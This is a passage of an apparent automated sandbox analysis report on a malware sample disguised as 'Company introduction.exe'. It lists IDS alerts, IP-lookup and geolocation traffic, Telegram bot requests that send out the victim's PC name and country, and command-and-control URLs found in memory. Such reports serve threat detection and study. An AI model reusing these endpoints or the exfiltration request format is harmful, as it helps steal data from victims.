                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49763 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49752 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49735 -> 104.21.48.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49756 -> 104.21.48.1:443
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49734 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49741 version: TLS 1.0
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:302494%0D%0ADate%20and%20Time:%2015/01/2025%20/%2014:34:14%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20302494%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:302494%0D%0ADate%20and%20Time:%2015/01/2025%20/%2014:14:32%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20302494%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 15 Jan 2025 07:39:15 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 15 Jan 2025 07:39:17 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: Company introduction.exe, 00000000.00000002.1733796821.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1759032801.0000000004405000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2937919242.000000000042F000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: Company introduction.exe, 00000000.00000002.1733796821.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2941471703.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1759032801.0000000004405000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003341000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2937919242.000000000042F000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                Source: Company introduction.exe, 00000000.00000002.1733796821.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2941471703.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1759032801.0000000004405000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003341000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2937919242.000000000042F000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                Source: Company introduction.exe, 00000006.00000002.2941471703.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003341000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: Company introduction.exe, 00000006.00000002.2941471703.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003341000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: Company introduction.exe, 00000000.00000002.1733796821.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1759032801.0000000004405000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2937919242.000000000042F000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: Company introduction.exe, 00000000.00000002.1732379162.0000000003261000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000000.00000002.1732379162.00000000034CF000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2941471703.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1756873041.0000000002998000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003341000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: Company introduction.exe, 00000000.00000002.1733796821.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2941471703.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1759032801.0000000004405000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003341000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2937919242.000000000042F000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                Source: Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: Company introduction.exe, 00000006.00000002.2941471703.000000000318A000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003429000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: Company introduction.exe, 00000000.00000002.1733796821.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2941471703.000000000318A000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1759032801.0000000004405000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003429000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2937919242.000000000042F000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: Company introduction.exe, 00000006.00000002.2941471703.000000000318A000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003429000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: Company introduction.exe, 00000006.00000002.2941471703.000000000318A000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003429000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:302494%0D%0ADate%20a
                Source: FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003506000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: Company introduction.exe, 00000006.00000002.2941471703.0000000003260000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003501000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                Source: Company introduction.exe, 00000006.00000002.2941471703.000000000318A000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2941471703.00000000030F2000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2941471703.0000000003162000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003392000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003429000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: Company introduction.exe, 00000000.00000002.1733796821.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2941471703.00000000030F2000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1759032801.0000000004405000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003392000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2937919242.000000000042F000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                Source: Company introduction.exe, 00000006.00000002.2941471703.000000000311C000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2941471703.000000000318A000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2941471703.0000000003162000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003429000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.00000000033BC000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                Source: Company introduction.exe, 00000006.00000002.2950101107.0000000004449000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.0000000004182000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.0000000004373000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.00000000041F7000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2941471703.00000000031AD000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.00000000041CF000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.0000000004326000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.0000000004470000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.00000000045C6000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.000000000344C000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.00000000046E9000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.0000000004422000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.0000000004497000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.0000000004614000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                Source: Company introduction.exe, 00000006.00000002.2950101107.000000000415D000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.0000000004424000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.00000000041D2000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.0000000004301000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.000000000432C000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.0000000004188000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.00000000045CC000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.00000000046C4000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.0000000004472000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.00000000045A1000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.0000000004428000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.00000000043FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: Company introduction.exe, 00000006.00000002.2950101107.0000000004449000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.0000000004182000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.0000000004373000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.00000000041F7000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2941471703.00000000031AD000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.00000000041CF000.00000004.00000800.00020000.00000000.sdmp, Company introduction.exe, 00000006.00000002.2950101107.0000000004326000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.0000000004470000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2947935946.00000000045C6000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 